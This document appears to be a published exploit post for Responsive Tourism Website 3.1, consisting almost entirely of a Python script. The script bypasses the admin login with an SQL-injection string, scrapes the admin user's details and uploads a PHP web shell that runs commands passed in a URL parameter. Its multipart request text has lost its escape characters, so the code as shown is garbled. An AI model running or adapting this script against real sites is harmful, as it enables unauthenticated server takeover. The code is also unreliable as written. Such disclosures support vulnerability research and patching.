Responsive Tourism Website version 3.1 suffers from a remote code execution vulnerability.
# Exploit Title: Responsive Tourism Website 3.1 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 22.06.2021
# Exploit Author: Tagoletta (Tağmaç)
# Software Link: https://www.sourcecodester.com/php/14838/simple-responsive-tourism-website-using-php-free-source-code.html
# Version: V 3.1
# Tested on: MacOS & Windows
import requests
import random
import string
from bs4 import BeautifulSoup
url = input("TARGET = ")
if not url.startswith('http://') and not url.startswith('https://'):
url = "http://" + url
if not url.endswith('/'):
url = url + "/"
session = requests.Session()
session.get(url + 'admin/login.php')
print("- Bypassing login -")
login_url = url + "classes/Login.php?f=login"
login_data = {"username": "admin' or '1'='1'#", "password": "admin' or '1'='1'#"}
session.post(login_url, cookies=session.cookies.get_dict(), data=login_data)
print("- Protecting User -")
protectSettings_url = url + 'admin/?page=user'
protectSetting_html = session.get(protectSettings_url)
protectSettings_parser = BeautifulSoup(protectSetting_html.text, 'html.parser')
ids = protectSettings_parser.find('input', {'name':'id'}).get("value")
firstname = protectSettings_parser.find('input', {'id':'firstname'}).get("value")
lastname = protectSettings_parser.find('input', {'id':'lastname'}).get("value")
username = protectSettings_parser.find('input', {'id':'username'}).get("value")
print("User ID : " + ids)
print("First Name : " + firstname)
print("Last Name : " + lastname)
print("Username : " + username)
print("- OK -")
let = string.ascii_lowercase
shellname = ''.join(random.choice(let) for i in range(15))
print("Shell uploading")
upload_url = url + "classes/Users.php?f=save"
upload_headers = {"Accept": "*/*", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary7gB8BDj2OLQBJbBT", "Accept-Encoding": "gzip, deflate", "Accept-Language": "tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7", "Connection": "close"}
upload_payload = "<?php if(isset($_GET['cmd'])){ echo '<b>Tagoletta</b><pre>'; $cmd = ($_GET['cmd']); system($cmd); echo '</pre>'; die; } ?>"
upload_data = "------WebKitFormBoundary7gB8BDj2OLQBJbBTrnContent-Disposition: form-data; name="id"rnrn"+ids+"rn------WebKitFormBoundary7gB8BDj2OLQBJbBTrnContent-Disposition: form-data; name="firstname"rnrn"+firstname+"rn------WebKitFormBoundary7gB8BDj2OLQBJbBTrnContent-Disposition: form-data; name="lastname"rnrn"+lastname+"rn------WebKitFormBoundary7gB8BDj2OLQBJbBTrnContent-Disposition: form-data; name="username"rnrn"+username+"rn------WebKitFormBoundary7gB8BDj2OLQBJbBTrnContent-Disposition: form-data; name="password"rnrnrn------WebKitFormBoundary7gB8BDj2OLQBJbBTrnContent-Disposition: form-data; name="img"; filename=""+shellname+"_Tagoletta.php"rnContent-Type: application/octet-streamrnrn"+ upload_payload +"rn------WebKitFormBoundary7gB8BDj2OLQBJbBT--rn"
upload = session.post(upload_url, headers=upload_headers, data=upload_data)
if upload.status_code == 200:
print("- OK -")
req = session.get(url + "/admin/?page=user", headers=session.headers)
parser = BeautifulSoup(req.text, 'html.parser')
find_shell = parser.find('img', {'id':'cimg'})
print("Shell URL : " + find_shell.get("src") + "?cmd=whoami")
else:
print("- NO :( -")
